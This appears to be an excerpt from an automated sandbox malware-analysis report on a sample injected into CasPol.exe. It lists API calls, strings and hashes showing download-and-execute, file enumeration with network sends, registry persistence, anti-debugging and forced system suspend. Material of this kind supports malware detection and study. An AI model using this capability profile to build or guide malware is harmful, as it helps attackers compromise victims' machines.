                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                            • String ID: PowrProf.dll$SetSuspendState
                                                                                            • API String ID: 1589313981-1420736420
                                                                                            • Opcode ID: 70035bef8a8482817f5ed11c5e7eeb401def3e9ea01ea4c5943ce5132b462a45
                                                                                            • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                            • Opcode Fuzzy Hash: 70035bef8a8482817f5ed11c5e7eeb401def3e9ea01ea4c5943ce5132b462a45
                                                                                            • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                            APIs
                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                            • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID: ACP$OCP
                                                                                            • API String ID: 2299586839-711371036
                                                                                            • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                            • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                            • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                            • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                            • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                            • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                            • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID: SETTINGS
                                                                                            • API String ID: 3473537107-594951305
                                                                                            • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                            • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                            • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                            • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00407A91
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstH_prologNext
                                                                                            • String ID:
                                                                                            • API String ID: 1157919129-0
                                                                                            • Opcode ID: afbe0c78addfd1fe1d4ebc6b55e9774795b3d026fa1d08a9208b54e180043126
                                                                                            • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                            • Opcode Fuzzy Hash: afbe0c78addfd1fe1d4ebc6b55e9774795b3d026fa1d08a9208b54e180043126
                                                                                            • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                            APIs
                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                            • _free.LIBCMT ref: 00448067
                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 00448233
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                            • String ID:
                                                                                            • API String ID: 1286116820-0
                                                                                            • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                            • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                            • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                            • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                            APIs
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DownloadExecuteFileShell
                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                            • API String ID: 2825088817-4197237851
                                                                                            • Opcode ID: 8ba785b80dafa41abaee6032e4d064bba756fb94a7f51b7ee612986cc14c7222
                                                                                            • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                            • Opcode Fuzzy Hash: 8ba785b80dafa41abaee6032e4d064bba756fb94a7f51b7ee612986cc14c7222
                                                                                            • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileFind$FirstNextsend
                                                                                            • String ID: x@G$x@G
                                                                                            • API String ID: 4113138495-3390264752
                                                                                            • Opcode ID: a8f7eea59e91c06644f6a958b0b0fcf8cb394d5864f2785748c83d4b13fddec0
                                                                                            • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                            • Opcode Fuzzy Hash: a8f7eea59e91c06644f6a958b0b0fcf8cb394d5864f2785748c83d4b13fddec0
                                                                                            • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                            APIs
                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                              • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                              • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCreateInfoParametersSystemValue
                                                                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                            • API String ID: 4127273184-3576401099
                                                                                            • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                            • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                            • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                            • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                            • String ID:
                                                                                            • API String ID: 4212172061-0
                                                                                            • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                            • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                            • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                            • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileFind$FirstH_prologNext
                                                                                            • String ID:
                                                                                            • API String ID: 301083792-0
                                                                                            • Opcode ID: 31790f828c392afa232191d11ff8bc0f8b84cf3cfa5ee74fabc000db9bac9bdb
                                                                                            • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                            • Opcode Fuzzy Hash: 31790f828c392afa232191d11ff8bc0f8b84cf3cfa5ee74fabc000db9bac9bdb
                                                                                            • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 2829624132-0
                                                                                            • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                            • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                            • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                            • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                            • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                            • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                            • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
                                                                                            • TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
                                                                                            • ExitProcess.KERNEL32 ref: 0044258E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1703294689-0
                                                                                            • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                            • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                            • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                            • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .
                                                                                            • API String ID: 0-248832578
                                                                                            • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                            • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                            • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                            • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                            • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                            • String ID: <D
                                                                                            • API String ID: 1084509184-3866323178
                                                                                            • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                            • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                            • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                            • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                            • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                            • String ID: <D
                                                                                            • API String ID: 1084509184-3866323178
                                                                                            • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                            • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                            • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                            • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                            APIs
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID: GetLocaleInfoEx
                                                                                            • API String ID: 2299586839-2904428671
                                                                                            • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                            • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                            • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                            • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                            • String ID:
                                                                                            • API String ID: 1663032902-0
                                                                                            • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                            • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                            • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                            • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$InfoLocale_abort_free
                                                                                            • String ID:
                                                                                            • API String ID: 2692324296-0
                                                                                            • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                            • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                            • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                            • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                            APIs
                                                                                              • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                            • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1272433827-0
                                                                                            • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                            • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                            • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                            • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                            • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                            • String ID:
                                                                                            • API String ID: 1084509184-0
                                                                                            • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                            • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                            • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                            • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                            APIs
